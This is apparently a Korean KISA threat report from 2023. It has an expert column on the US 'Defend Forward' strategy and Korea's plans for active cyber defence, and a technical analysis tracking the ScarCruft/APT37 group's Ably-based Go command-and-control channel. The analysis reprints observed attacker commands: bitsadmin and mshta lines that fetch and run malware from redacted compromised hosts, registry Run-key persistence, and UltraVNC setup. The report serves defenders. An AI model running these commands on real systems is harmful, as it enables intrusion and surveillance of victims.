위협을 이해하라 자신을 표적으로 삼을 가능성이 높은 잠재적 공격자, 공격하려는 이유, 네트워크 보안,
애플리케이션 보안, 악용할 수 있는 공급망 보안 취약점을 이해하고 취약점의 우선순위를 사전에 정리하라.
정보 공유와 협업하라 산업 전반과 연방정부, CSIRTS(computer security incident response team), 학술
기관과의 협업 및 정보 공유가 위협을 이해하고 선제적으로 해결하는 데 중요하다. 익명성을 보호하도록
설계된 정책과 프로세스를 통해 신뢰를 구축하는 것이 필요하며, OT-ISAC는 TLP(Traffic Light Protocol) 및
익명 제출을 활용하는 기계 간 공유 메커니즘이 지원하고 있다.
위협 정보를 기반으로 판단하고 대응하라 위협 정보를 기반으로 다양한 전략 및 전술적 보안 결정이
이루어져야 하며, 모든 보안 실무자가 위협 정보를 일상적인 대응 및 의사 결정에 최대한 많이 통합
반영되도록 권장한다.
대규모 분석 기술을 활용하라 대규모 분석 기능은 의심스러운 활동을 초기 단계에서 사전에 발견하고
공격을 중단할 수 있도록 한다. 위협 추적, 조기 탐지 및 자동 대응을 위해 대규모로 인공 지능 및
머신러닝을 활용하는데 필요한 데이터 관리 기능이 필요하다.
여전히 위험에 처해 있다고 가정하라 특히 국가가 지원하는 사이버 공격을 완전히 저지할 수 없을 수
있지만, 적이 악용할 가능성이 있는 "문과 창문"(취약점)을 식별하고 이를 수정하며, 파트너에게 동일한
작업이 이행되도록 집단적으로 움직일 필요가 있다.
9) https://en.wikipedia.org/wiki/Petya_and_NotPetya
10) https://en.wikipedia.org/wiki/Colonial_Pipeline_ransomware_attack
11) https://www.nationalisacs.org/
60
전문가 칼럼
3. 미국 공공 사이버보안 기술 개발 방향
019년 12월, 백악관 과학기술정책실(OSTP)은 국가 최상위 사이버보안 연구개발 4개년 전략계획12) 보고서를
2
발표하였다. 기존 ’16년에 발표된 전략계획 13)을 새롭게 개편하고, ’18년에 제시한 국가 최상위 사이버
전략(National Cyber Strategy of the United States of America)을 반영하여 5대 전략을 제시하였다.
사이버보안 내 인간 역할 증진
효율적 사이버보안 관련 위험 관리
악의적인 행위에 대한 효과적이고 효율적인 사이버 억지 및 대응
안전-보안-사생활보호(Safety-Security-Privacy) 통합형 사이버 보안 체계 구축
지속 가능한 사이버 보안 시스템 개발
계획은 사이버 보안 목표를 실현하기 위해 네 가지 방어 요소 프레임워크를 제공한다. IT 시스템은 악의적인

이
사이버 활동에 취약하다고 가정해야 하며 완벽한 보안은 불가능하다는 전제로 시작한다. 보안은 위협이 진화함에
따라 조정되고 이에 대응할 수 있는 유연하고 지속적인 자체 평가 프로세스 및 정보에 입각한 조치로 이루어져야
한다.
eter, Protect, Detect 및 Respond의 사이버 보안 프레임은 전체 범위의 사이버 보안 요구사항을 반영하고
D
R&D를 조정하여 공동 목표에 달성하기 위한 구조를 제공하게 된다. 각 구성 요소는 다음과 같이 정의된다.
그림 4-4 사이버 보안 강화를 위한 4대 연계 모델
억지(Deter) 잠재적인 적에 대한 비용을 늘리고 피해를 줄이며 위험과 불확실성을 증가시켜 악의적인
사이버 활동을 억지할 수 있는 능력
12) https://www.nitrd.gov/pubs/Federal-Cybersecurity-RD-Strategic-Plan-2019.pdf
13) 사이버보안 국가 행동계획(CNAP: Cybersecurity National Action Plan)
61
전문가 칼럼
보호(Protect) 악의적인 사이버 행동에 효율적으로 저항하고 기밀성, 무결성, 가용성 및 책임을 보장하는
구성 요소, 시스템, 사용자 및 주요 인프라의 보안 기능
감지(Detect) 완벽한 보안이 불가능하고 시스템이 악의적인 행동에 취약한 것으로 가정한 상태에서 적의
결정과 활동을 효율적으로 감지하고 예측할 수 있는 능력
대응(Respond) 공격에 효율적으로 적응하고, 악의적인 활동에 대응하고, 피해로부터 복구하고, 복원을
완료하는 동안 정상 운영을 유지하며, 유사한 미래 활동을 저지하기 위해 조정함으로써 악의적인 사이버
활동에 동적으로 대응하는 방어자, 방어 및 인프라의 능력
’18년 미국 사이버 전략의 우선순위 목표와 정부 2021년 R&D예산 우선순위를 반영하여, 다음과 같이 6대
중점분야에서 각각 사이버 보안 구성 요소와 도전과제를 제시하였다.
인
공지능(Artificial Intelligence) 4대 사이버보안 구성요소에 모두 영향을 미치는 주제로써, 인공지능 시스템의
빠른 속도 및 규모에 대한 운영 개선, 인공지능시스템 해석 가능성 향상, 인공지능 시스템 구성요소 취약성
보완 및 효율성 평가 방법
양자 정보과학(Quantum Information Science) 보호 요소와 관련된 주제로써, 양자 소프트웨어 및

하드웨어 안정성 강화, 효율적 양자 암호화 프로토콜 개발, 양자 정보과학 기반 사이버 공격 예측 및 대응
분산형 디지털 인프라(Trustworthy Distributed Digital Infrastructure) 억지요소를 제외한 3대 요소에

해당하는 주제로써. 5G와 포스트 5G 무선통신 보안과 회복력 강화, 에지 컴퓨팅(Edge Computing) 및 포그
컴퓨팅(Fog Computing) 개발, 사물인터넷 확산, 사이버-물리 시스템 및 주요 인프라 사이버보안 강화
프라이버시(Privacy) 보호 요소에 해당하는 주제로써. 프라이버시 보호 시스템 개발의 어려움 극복, 사생활
보호 시스템 개발 도구의 부재, 사생활 침해로부터 효과적인 회복 방안 마련
시큐어 하드웨어·소프트웨어(Secure HW & SW) 보호, 감지 요소에 해당하는 주제로써. 안전한 하드웨어
공급망 구축, 악의적 하드·소프트웨어 소유 예방, 하드웨어 취약성 보완, 소프트웨어 정기적 업데이트,
효과적 소프트웨어 관리 등
사이버 보안 교육 확대 및 노동력 증진(Education and Workforce Development) 4대 분야 전체에

해당하는 주제로써. 전문성 및 일반인 교육 간의 균형 달성, 취약계층 학생과 근로자의 참여 강화, 공교육
혁신, 교육업계 전반의 경쟁력 강화, 사이버 보안 관련 교육자 양성, 과학자 및 공학자 교육 강화
Y 2021년부터 3년간 수행된 과제를 바탕으로 우선 순위 영역별 투자 비중을 조사한 최근 통계자료에

F
따르면, 예상대로 인공지능 영역이 41.2%로 가장 많이 식별되었다. 두 번째는 Secure HW & SW로 29%이고
양자정보과학 영역이 5.7%로 가장 낮은 비중을 차지하고 있다.
62
전문가 칼럼
4. 한국의 Defend Forward 관련 기술 개발 방향
국, EU 등 주요국 들의 사이버 전략이 보호 대상을 방어하는 수동적 방어보다 선제적으로 대응하겠다는 공통된
미
방향성을 보임에 따라 한국도 기술 개발 방향을 새로운 패러다임으로 집중하려고 하고 있다.
(능동적 방어) 사이버공격으로 인한 피해가 발생하기 전 또는 피해가 확대되기 전에 공격자의 의도를 미리
분석하여 이에 대한 조치를 사전에 수행하는 적극적 사이버 방어
(복원력 강화) 사이버 공격이 발생하더라도 핵심 자산·자원에 대한 복구 체계 마련하여 조직·시스템의

중단을 최소화하고 핵심 기능이 신속하게 복구되어 지속적으로 운영될 수 있도록 대비하는 사이버 복원력
확보에 주력
(국가 안보) 사이버공간에서 발생하는 악성 행위(사이버 공격, 위협 등)가 국가 안보(공공안전, 경제발전)에

심각한 위협임을 강조. 우크라이나-러시아 전쟁으로 촉발된 사이버戰, 주요 기반시설에 대한 테러 등으로
사이버보안 전략의 수립·개정, 거버넌스, 법·제도 개편
에, 우리나라도 선제적 방어체계로의 정책 방향을 수립한 바 있으며, 국가 사이버공간 주권 확보 및 선진국과

이
대응한 관계에서 국제협력이 가능하도록 정책 방향에 상응하는 선제적 대응 역량 확보를 위한 기술 개발의
필요성을 강조하고 있다.
국가 사이버안보전략 및 기본계획14)은 사이버 공격에 대한 억지력 확보와 더불어 공격 대비태세 강화,
능동적 대응 수단 강구, 사이버범죄 대응 역량 제고 등 사이버 공격을 보다 능동적·선제적으로 대응하기
위한 전략을 제시하고 있다.
① 사이버공격 억지력 확보
•사이버공간 취약점 관리 (소프트웨어 취약점 식별 등)
•사이버공격 원인 분석 기술 확보 (신종 사이버 공격 분석, 보안위협 자동분석 등)
•사이버공격 억지를 위한 배후 규명 (사이버공격 원인 분석, 공격원점 규명 등)
② 대규모 공격 대비태세 강화
•사이버 위기상황 판단 및 합동조사·대응체계 (침해대응 협의회, 위협지수 개발 등)
•지능정보기술 기반 사이버공격 탐지술 (공격 형태분석, 취약점 자동분석/패치 등)
•범국가적 사이버위기 대응능력 제고 (민·관·군 사이버공격 대응훈련 등)
③ 포괄적ㆍ능동적 수단 강구
•사이버위협 포괄적·능동적 대응 (우방국, 국제 안보기구 등과 협조체계 구축 등)
•사이버전 대비 전략·전술, 사이버 전력체계 보강(포괄적·능동적 사이버작전 등)
•사이버전 수행 인력 정예화 (사이버전술 훈련장 구축 등)
④ 사이버범죄 대응역량 제고
•사이버범죄 관리강화, 사회안전망 구축 (사이버안전 모니터링, 민·관 협조체계 구축 등)
•사이버범죄 대응 수사·기소 역량 제고 (증거확보 및 공격자 식별, 수사 역량 등)
14) 국가 사이버안보 전략 및 기본계획, 관계부처 합동, `19.9.3
63
전문가 칼럼
세계 주요국의 사이버 보안 정책 및 기술 개발 방향성을 고려하고 최근 사이버 보안 이슈 사항에 대응할 수

전
있도록 과학기술정보통신부를 중심으로 새로운 기술 개발 프로그램15)을 준비 중에 있다. 이는, 사이버 위협에
대한 종합적인 계획을 마련하고 능동 대응 핵심 기술 개발을 통해 국가 사이버 안보 대응 역량 강화를 목표로
하고 있다.
주요 추진 내용으로는 고도화되는 사이버 공격에 상황(前→中→後)별 대응을 위한 공격 억지(前)→선제면역(中)
→회복탄락(後) 등 사이버보안 능동대응 기술 개발을 세부 목표로 설정하고 있다.
(출처: 사이버보안 능동대응기술 개발 사업 기술수요조사 안내 공고문 (IITP 2023.3.23.))
그림 4-5 사이버보안 능동대응 기술 사업 개념도

출처: 사이버보안 능동대응기술 개발 사업 기술수요조사 안내 공고문 (IITP 2023.3.23)
(공격억지) 사이버 공격을 사전에 효율적으로 억제하기 위해 공격자의 공격 의지 감소, 공격 비용 증가 등을 위한

기술 개발
(선제면역) 응용프로그램, 디바이스, 네트워크 등의 사이버공격에 의한 피해를 예방하거나, 공격 행위를 차단하기
위한 기술 개발
(회복탄력성) 사이버공격을 받는 상황에서도 시스템이 피해를 견디면서 복구 및 적응하여 정상 임무 수행을
보장하는 기술 개발
(기반조성) 사이버보안 협력 대응 및 정보 공유 기반 강화 기술
15) 사이버보안 능동대응 기술 사업, 기술수요조사 안내 공고문 (IITP 2023.3.23.), https://www.iitp.kr/kr/1/notice/notify.it
64
전문가 칼럼
분야 전략기술 개 념
사이버공격 미래 사이버공격에 효율적인 대응을 위해 능동적 예방 보안 전략으로 전환하여
기만(우회) 기술 공격자의 비용을 극대화시키고, 공격 목표에 달성하기 어렵게 만드는 기술
공격 사이버공격 해킹·악성코드, 가상자산, 익명 네트워크 등을 활용하여 사이버공격(범죄)을 기

억지 추적/감시 기술 획·실행하는 근원지 식별 추적·감시 기술
사이버공격 사이버공격(범죄) 응징(수사기소)을 위한 기술 역량 제고를 위해 사이버 공격 수

포렌식 기술 사· 분석 포렌식 기술 개발 및 증거 데이터에 대한 신뢰성 확보 기술
취약점 정보로 확인 불가한 공격 목적 및 흐름 정보 제공을 통해 취약점 탐지/

사이버 풀체인
차단 중심의 보호에서 공격 목적 방어 및 흐름 단절 중심의 선제적 보호 기술
공격대응 기술
포괄
선제 공급망 사이버 위협
공급망을 통해서 유통되는 하드웨어 및 소프트웨어 대한 잠재적인 사이버 위협
면역 선제 대응을 위한 시큐어
을 선제적으로 대응하기 위한 위협 식별 및 보호 기술
프로비져닝 및 검증 기술
5G/6G 이동통신망 이동 통신망을 통해 공격조직의 활동을 추적하고, 이동통신망 내 보안 위협을
보안위협 방어 기술 방어하는 6G보안 표준 설계 등 이동통신망 취약점기반 능동보안 기술
사이버방어 체계에 대한 공격 이후 발생 가능한 국가 핵심기반인 사이버 물리
사이버 회복탄력성 체계에 대한 피해를 정량적으로 예측하고 중대한 피해가 예측되는 핵심 임무서
예측 및 진단 기술 비스(또는 핵심 표적대상)에 대한 회복 탄력성의 준비 상태를 진단하기 위해 복
원력 측정 지표 개발 및 관련 측정 가능한 정성적, 정량적 기술
회복 측정된 회복탄력성 결과를 사용하여 요구되는 메트릭 이상으로 핵심 임무 지속
탄력 사이버 회복탄력성 성 보장을 위해 소요되는 기술들을 개발하기 위해 공격에 대한 성능 모니터링,
유지 및 향상 기술 감내, 회복 및 적응 등에 실제 사용되는 NIST 사이버리질리언스 엔지니어링에
서 분류된 16개 분야의 기술들과 사이버전자전 방어기술
사이버 회복탄력성 사이버복원력을 위한 효과적인 복구기술과 예측, 진단, 향상 기술 적용의 결과
복구 및 평가 기술 와 사이버전자전 피해 및 방어 효과를 측정 평가할 수 있는 기술
사이버보안 협력대응 및 글로벌 사이버위협에 능동적으로 대응하기 위한 범국가 사이버보안 정보공유
정보 공유 기반강화 체계 구축 및 부처간 연계 기술
CF(Cybersecurity
사이버보안 분야 기술, 자원, 전략, 기관 간의 연계/연합 체계 및 표준화
기반 Federation)
(Standadization/Specification) 구축 기술
조성 지향 표준화 구축 기술
전략적 사이버보안 인적
국가 사이버보안 인력 경쟁력 강화를 위한 훈련기술 등 인적자원 관리·개발 기술
자원 개발 및 관리기술
기타 기술 이 외, 국가 사이버위협에 대한 능동 대응을 위한 기타 기술
표 4-1 정보보호 분야 전략기술 관련 주요 핵심기술 및 기반조성 기술
출처: 사이버보안 능동대응기술 개발 사업 기술수요조사 안내 공고문 (IITP 2023.3.23.)
65
전문가 칼럼
결 언
고에서는 지난 수 년간 미국 정부에서 발표한 사이버 안보전략 보고서에서 핵심 키워드로 자리하고 있는

본
Defend Forward의 의미와 구현 이해도를 살펴보았다. Defend Forward 개념은 공격적인 사고 방식으로
방어하고, 악의적인 사이버 활동을 초기 단계에서 선제적으로 방해하거나 중지하며, 적의 비용을 증가시키는
사이버 전략을 의미한다.
번 동향 분석으로 Defend Forward의 의미와 핵심 요소를 충분히 이해할 수 있으나 이 전략 개념을 기술적으로
금
완성시키고 실제 환경에서 구현, 구축 및 운용하는 것은 보다 많은 준비와 노력이 필요해 보인다.
와 연계하여, 美 연방 사이버보안 R&D 전략계획(백악관 과학기술정책실, ’19.12.)에서는 사이버보안 목표

이
실현을 위해 4대 방어요소(억제, 보호, 탐지, 대응) 기반의 구체적 능동보안 프레임워크를 제시하여 관련 기술을
개발하고 있다. 공격자 행위에 대한 억지력을 강화하고 모든 사이버 보안 역량을 총동원하여 공격의 예측과
대응력을 강화하는 공세적·능동적 방어 기술 개념으로 발전시키고 있다.
재, 우리나라에서도 미국의 공세적 능동방어 기술 프레임을 보다 발전시킨 사이버 능동대응 기술 개발

현
프로그램을 계획 중이다. 사이버 공격 변화에 따른 글로벌 사이버보안 패러다임 변화, 선제 대응형 방어
체계 구축, 사이버 복원력 강화, 글로벌 사이버 보안 협력 등 현행 이슈에 대응하고, 더불어 국가 사이버안보
기본계획, 국가전략기술 육성 방안 등 정부 정책의 성실한 이행을 위해 사이버 능동대응 기술 개발이 성공적으로
착수되기를 바라는 바이다.
66
2023년 상반기
보고서
Part. 3
Techniques┃ 기술 보고서
3-1. K
ISA 침해사고분석단 종합분석팀
김동욱 선임, 이태우 선임, 이슬기 선임 :
TTPs $ ScarCruft Tracking Note
3-2. K
ISA 침해사고분석단 사고분석팀_신우성 선임,
플레인비트_이예나 선임, 이상아 연구원, 한택승 연구원 :
블랙캣 랜섬웨어 침해사고 기술보고서
2023년 상반기 사이버 위협 동향 보고서 Techniques
기술 보고서
Part. 3
TTPs $ ScarCruft KISA 침해사고분석단 종합분석팀

3-1 Tracking Note 김동욱 선임, 이태우 선임, 이슬기 선임
Abstract
공격 조직
본 보고서에서 분석한 조직은 최소 2012년부터 국내를 대상으로 공격 활동을 펼치고 있습니다. 공격 조직의 이름은
각 보안업체들마다 명명한 여러 가지 이름으로 불리고 있으며 대표적인 이름은 아래와 같습니다. 본 보고서에서는
Kaspersky로부터 공유 받은 샘플로부터 추적을 시작하였기 때문에 ScarCruft라는 이름을 차용하여 설명합니다.
AKA Named By
ScarCruft Kaspersky
APT37 Mandiant
금성121 ESTsecurity
Red Eyes AhnLab
Ricochet Chollima CrowdStrike
공격 조직의 타겟과 목적
ScarCruft 그룹은 국가기반 해킹 조직으로, 국가의 체제 유지를 위해 공격을 수행하는 것으로 보입니다. 체제를
이탈한 주민, 해외 파견 근로자, 기자 및 선교사를 주 공격 대상으로 삼고 있습니다. 뿐만 아니라 공격 조직이 속한
국가와 관련된 국내 주요 인사들도 공격 대상입니다. 공격 대상에 대해 해킹에 성공하면 대상의 휴대전화 기록,
데스크톱 기록, 메신저 채팅 기록 등을 탈취합니다. 침해한 시스템을 파괴하거나 탈취한 정보로 협박하는 등의
행위를 하지 않는 것으로 보아 감시 목적이 강한 것으로 추정됩니다.
68
기술 보고서
주요 침투방식
목표 대상이 관심을 가질 만한 내용으로 스피어피싱 이메일을 송부하여 악성코드를 다운로드 받도록 유도하는
방식을 많이 사용합니다. 또한 메신저 채널에 위장 잠입하여 악성앱 설치를 유도하기도 합니다.
본 보고서의 핵심 내용
한국인터넷진흥원은 기존 발표한 보고서(TTPs #9 개인의 일상을 감시하는 공격전략 분석) 이후 지속적인 추적을
통해 ScarCruft 공격조직이 새로이 사용한 신규 명령제어 채널을 발견했습니다. 우리는 신규 명령채널을 모니터링
할 수 있는 도구를 직접 개발 제작해 작년 10월 중순부터 약 2개월간 공격자의 명령제어 과정을 24시간 추적하고
모니터링 하는 활동을 수행했습니다. 그 결과, 해당 조직의 타겟으로 확인된 감염자를 확인해, 피해가 확산되지
않도록 조치했습니다. 공격자는 타겟을 감시하기 위해 Chinotto 악성코드를 적극적으로 활용하며 VNC 설치,
정보유출 등의 활동을 하는 것으로 확인했습니다. 그리고 공격대상의 환경과 공격목적에 맞게 명령제어 체계를
재정비하는 정황도 확인했습니다.
KrCert/CC는 지속적인 추적 활동을 통해 공격자의 변화된 TTP를 확인하고 이것을 알림으로써 방어자들에게 각자의
방어 환경에 맞는 전략을 수립하는데 도움을 줄 것입니다. 또한 단순히 공격자의 행위를 추적하고 TTPs를 파악하는
활동을 넘어 피해사실 인지 즉시 조치해 민간 기업과 개인의 위협을 제거하고 억지하기 위해 끊임없이 노력하고
있습니다.
1. Introduction
2022년 연말 공개한 TTPs #9 개인의 일상을 감시하는 공격전략 분석을 통해, 고도화된 정보수집 활동과 공격 기법,
전술, 그리고 절차에 대하여 공유했습니다. 본 문서에서는 보고서 게시 시점에 공개하지 않았던 Go 언어 기반의
새로운 명령제어 기법에 대해 설명하고, 악성코드에 내재된 API 키를 활용해 공격자의 행위를 모니터링 한 결과를
공유합니다.
69
기술 보고서
2. Attack Scenario (Updated)
공격자는 공격을 수행하고 지속하기 위해 TTP 중 일부를 지속적으로 변화하며 공격을 수행하고 있습니다. 우리는
위협을 추적 및 제거하고 분석하는 과정에서 기술(Techniques)의 변화를 확인했습니다. 기존 공격 과정에서는
명령제어를 위해 스크립트 기반의 명령제어를 활용했으나, 현재 Golang 기반 명령제어 체계를 구축해 더욱 더
은밀하게 명령제어를 수행하고 있음을 확인했습니다.
명령제어를 위해 Ably라는 Third party 라이브러리를 악용해 명령제어를 위한 비밀 통신 채널을 생성하였으며, 해당

악성 프로그램을 Go언어로 작성해 유포했습니다. 뿐만 아니라 목표대상에 침투하고 지속성을 유지(채널이 동작하지
않을 상황을 대비)하기 위해 다양한 명령제어를 위한 악성코드를 추가로 설치하고 있음을 확인했습니다.
우리는 이번 보고서를 통해 ScarCruft 그룹의 신규 악성코드인 Go언어 기반 원격제어기를 이용한 명령제어 과정과
침투 이후 공격자의 행위(Procedures)에 대해 상세히 이야기합니다.
기존 공격 시나리오
최신 공격 시나리오
70
기술 보고서
3. Third-party 라이브러리(Ably)를 악용한 명령제어
3.1. Ably란?
가. External Remote Services
Ably는 실시간으로 데이터를 송수신해, 통계정보를 제공하거나 휴대폰 알림 서비스 등으로 활용할 수 있는 서비스
입니다. Ably 서비스를 이용하면, 서버의 메일과 스마트워치의 생체정보도 저장하고 이를 실시간으로 연동해
데이터를 공유할 수 있기 때문에 유연한 정보 송수신이 가능합니다. 공격자는 Ably 서비스를 악용해, Go 언어
악성코드에 명령제어 기능을 새로이 구현했습니다.
Ably(https://ably.com)[2]
Ably 서비스 개요도
71
기술 보고서
3.2 Ably를 악용한 Golang 명령제어 체계

공격자는 Ably 서비스를 악용해 새로운 명령제어 체계를 구축했습니다. 그리고 이 체계는 Golang 언어를 이용해
제작된 새로운 악성코드를 기반으로 동작합니다. 간단한 동작절차는 다음과 같습니다.
(1) 공격자는 Ably 채널을 생성하고 감염자의 채널접속을 대기합니다.

(2) 피해자는 악성코드에 감염되면 내부에 존재하는 Ably API 키와 함께, PC 이름과 계정명으로 HELO라는
문자를 주기적으로 채널에 업로드(데이터명: UP)합니다.
(3) 모 니터링하고 있던 공격자는 명령이 필요한 PC에게 추가 악성코드를 감염시키는 명령을 base64로
인코딩하여 하달(데이터명: DOWN)합니다.
(4) 피해자는 채널을 실시간으로 접근해 자신의 ID가 있는 명령을 확인, 실행합니다.
(5) 피해자는 실행결과를 다시 채널로 업로드(데이터명: UP)합니다.
이 명령체계의 장점 중 첫 번째는 차단이 불가능하다는 점입니다. 우리는 정상적인 서비스인 Ably를 차단할 수
없기 때문입니다. 두 번째는 공격자의 IP 노출이 최소화된다는 점입니다. Ably 내부에 로그가 존재할 수는 있지만,
서비스 이용자에게 접속 로그를 제공하는 기능은 존재하지 않습니다. 그리고 세 번째는 외부 서비스를 사용하기
때문에 어디에서나 명령제어가 가능하다는 점입니다. 위와 같이, 공격자는 Ably 서비스의 장점을 그대로 활용할 수
있습니다.
72
기술 보고서
중요한 명령을 하달할 때는 ScarCruft의 대표적인 원격제어 도구인 Chinotto 악성코드뿐 아니라 다른 환경에서 동작
가능한 원격제어 도구를 개발/운용하는 것으로 추정됩니다.
Golang based Ably API(악성코드)
악성코드 내부에서 활용되는 Ably API
Ably API 키/채널데이터 이름
Realtime 클라이언트 객체 생성을 위한 Ably API 키
공격자가 명령제어로 악용할 Ably 채널 이름(global)
클라이언트가 공격자 명령을 수신하는 데이터 이름(DOWN)
73
기술 보고서
4. Discussion
4.1 Defend Forward
우리는 선제적으로 대응을 하는 Defend Forward 관점에서 3.2에서 확인할 수 있었던 Ably 서비스의 API 키를
활용, 공격자의 명령제어 채널을 모니터링할 수 있었습니다. 특히, 악성코드를 단순 실행하게 되면 분석환경
정보가 공격자에게 송신되기 때문에, Go 언어를 기반으로 모니터링 스크립트를 직접 개발, 운영했습니다. 그 결과
ScarCruft의 명령제어 데이터를 확보, 추가적으로 데이터를 분석할 수 있었습니다.
Defend Forward는 방어자가 공격적인 사고방식으로 사이버 공격에 대응하는 것을 의미하며,

공격 초기단계에서 선제적 대응을 통해 공격자 리소스를 증가시키는 등 방어활동을 수행합니다.
4.2 Monitoring
ScarCruft의 명령제어를 모니터링하는 중 다양한 유형의 명령제어 악성코드를 확인 가능했으며, 과거부터 활용되어
온 명령제어 악성코드와 Golang으로 제작된 신규 서비스(Ably) 기반 악성코드까지 활용한 것을 발견했습니다.
이것은 메인 명령제어 체계의 수단이 비정상적으로 동작할 경우 대체하기 위한 면도 있겠지만, 잠재적 공격대상들이
보유한 환경이 다양하기 때문에 그에 따라 공격도구를 다변화하여 사용하는 것으로 추정됩니다.
74
기술 보고서
File Name Description comment

CKUP_****.dll 정보유출 및 명령제어(스크린 캡처, 키로깅 등) PE
Second.ini PowerShell 기반 명령제어기 GO BASE PE
3.html Second.ini 와 동일 기능 JScript
myvnc.dll Second.ini 와 동일 기능 PE
a.ini ltra VNC 관련 설정 파일 Setting file
b.ini UltraVNC Server Property Page PE
수집 로그(’22.10.18 16:57:35~‘22.12.21 02:16:35, 78,834라인, 5.9MB, 18개 감염기기)
최초 감염 이후, 공격자는 어떠한 명령을 수행하는가?

감염단말기로 개인별로 특화된 악성코드를 내리고, msinfo32.exe를 통해 악성코드를 실행, 공격자와 감염자의
통신채널을 구축합니다. 이후, 정보유출을 위해서 UltraVNC를 사용하기도 합니다.
아래는 감염자가 최초로 감염된 이후에 공격자가 어떻게 명령을 내렸는지 확인할 수 있는 실제 데이터입니다.
<# D-Day: 최초 비콘신호 발생일 #>

# D+10: 기존 악성코드(evc.dll)를 삭제하고, 새로운 악성코드(CKUP_****.dll<->evc.dll)를
다운로드 받고 실행, 윈도우 재시작시 자동실행되도록 레지스트리에 등록(값: msinfo)합니다.
taskkill /im msinfo32.exe /f
del c:\users\public\libraries\evc.dll
bitsadmin /transfer mm http://[compromised host]/xe/files/attach/images/555/
[CKUP_****].dll c:\users\public\libraries\evc.dll
forfiles /p c:\users\public
reg query hkcu\software\microsoft\windows\currentversion\run
reg delete hkcu\software\microsoft\windows\currentversion\run /v rANwUamQZpSHw /f
reg delete hkcu\software\microsoft\windows\currentversion\run /v RLWa /f
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v msinfo /d “C:\
Users\Public\msinfo32.exe” /f
75
기술 보고서

c:\users\public\msinfo32.exe
# D+25: D+10과 같이, 기존 악성코드(CKUP_****.dll<->evc.dll)를 삭제하고, 새로운

악성코드(CKUP_****.dll->evc.dll)를 다운로드합니다. 이후, msinfo32.exe를 통해 다시 로드/
실행합니다.
forfiles /p c:\users\public
del c:\users\public\libraries\evc.dll
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/
[CKUP_****].dll c:\users\public\libraries\evc.dll
whoami
c:\users\public\msinfo32.exe
# D+29: mfc42u-myvnc-win10.dll, myvnc.dll을 다운로드하고 msinfo32.exe를 통해 x86

기반의 명령제어 악성코드를 실행합니다.
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v msinfo64 /d “c:\
users\public\myvnc\msinfo32.exe” /f
mkdir c:\users\public\myvnc
mfc42u-myvnc-win10.dll c:\users\public\myvnc\mfc42u.dll
myvnc.dll c:\users\public\myvnc\evc.dll
c:\users\public\myvnc\msinfo32.exe
whoami
forfiles /p c:\users\public\myvnc
copy c:\windows\syswow64\msinfo32.exe c:\users\public\myvnc\msinfo32.exe
# D+39: mshta.exe를 이용하여 악성 스크립트(JScript 명령제어 악성코드)를 실행합니다.

mshta http://[compromised host]/skin/product/1.html
# D+46: mshta.exe를 이용하여 악성 스크립트(JScript 명령제어 악성코드)를 실행합니다.

mshta http://[compromised host]/skin/product/1.html
76
기술 보고서
<# UltraVNC 사용사례 #>

bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/b.ini
c:\users\public\winvnc.exe
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/a.ini
c:\users\public\UltraVNC.ini
공격자는 언제 작업을 수행하는가?

공격자는 평일에 근무하고 주말에 휴식을 취하는 주6일제로 근무하는 것으로 보입니다. 또한, KST(UTC+9)를
기준으로 데이터를 해석할 경우, 업무시간 또한 일반적인 9 TO 6로 추정됩니다.(혹은 더 이른 출근시간으로
보입니다)
모니터링 했던 2개월여 기간 중 명령이 없던 날은 9일(전체 주말: 18일)이기 때문에 평균적으로 주 6일로

근무한다고 추정할 수 있습니다. 또한, 휴일을 탄력적으로 조정 가능한 것으로 보입니다.
감염기기(DESKTOP-*******-user)의 경우, 공격자는 토요일 저녁(2022-12-03 20:51:38)에 처음으로 작업을

시작해, 자정(2022-12-04 00:06:29)에 공격을 마무리하고, 다음날 일요일인 2022-12-04 08:31:38에 다시
공격을 시작했습니다. 위의 사례를 보아 특별근무가 필요한 경우, 공격자는 주말에도 쉬지 않고 공격하는 것으로
보입니다.
77
기술 보고서
공격자는 최초 침투 이후 어떤 작업을 수행하는가?

공격자는 윈도우 실행시 mshta를 통해 악성코드가 실행되도록 레지스트리에 등록합니다. 이 스크립트는
자동화된 프로그램에 의해 생성되었을 수 있다고 추정합니다.
ping 명령어의 수행시간과 레지스트리 등록 값을 랜덤으로 부여하며, 레지스트리에 등록되는 랜덤 값들이

동일한 값을 가지는 것은, mshta를 통해 실행되는 악성 스크립트가 프로그램에 의해 새로 생성된다고 추정할 수
있습니다.
PybPMHPBZzOvW 493003 http://[compromised host]/data/8.html

RLWa 466887 http://[compromised host]/install.bak/sony/8.html
RNta 505469 http://[compromised host]/win/shenti/1.html
VVjwMPurpbE 458506 http://[compromised host]/data/3.html
XgTLkcrfUh 586876 http://[compromised host]/data/6.html
ZIhEHoHNOq 557912 http://[compromised host]/install.bak/sony/1.html
eLJS2WPERP5jc 514783 http://[compromised host]/editor/uploads/data/14753.html
jreWLiWlpnSF 373933 http://[compromised host]/data/9.html
nAhQkqqCnoRMq 500780 http://[compromised host]/install.bak/sony/10.html
rANwUamQZpSHw 493887 http://[compromised host]/install.bak/sony/8.html
xczzkvQfArATVP 503189 http://[compromised host]/install.bak/sony/8.html
yMDB 584647 http://[compromised host]/data/7.html
78
기술 보고서
4.3 Human vs. Automation
아래 근거를 종합해 판단했을 때, ScarCruft의 조직원들에게는 공격을 수행하기 위한 매뉴얼과 스크립트 생성기가
존재하고, 일부 변수에 대하여 사람이 직접 수정, 공격하는 것으로 추정됩니다.
근거 1 mm vs. mmm
공격자는 bitsadmin을 이용해서 악성코드를 다운로드 하는데 bitsadmin 명령어의 작업명칭을 지정할 때 mm과
mmm을 사용했습니다. 따라서, 모든 명령어를 사람이 작성한다기 보다 매뉴얼에서 명령어를 복사 후 URL과
작업명만 사람이 수정해 활용한다고 추정할 수 있습니다.

CKUP_****.dll c:\users\public\libraries\evc.dll
bitsadmin /transfer mm http://[compromised host]/xe/files/attach/images/555/myvnc.
dll c:\users\public\myvnc\evc.dll
bitsadmin /transfer mmm http://[compromised host]/Data/000/CKUP_****.dll c:\

users\public\libraries\evc.dll
CKUP_****.dll c:\users\public\libraries\evc.dll
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/a.ini
c:\users\public\UltraVNC.ini
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/data-
temp.dll c:\users\public\data\evc.dll
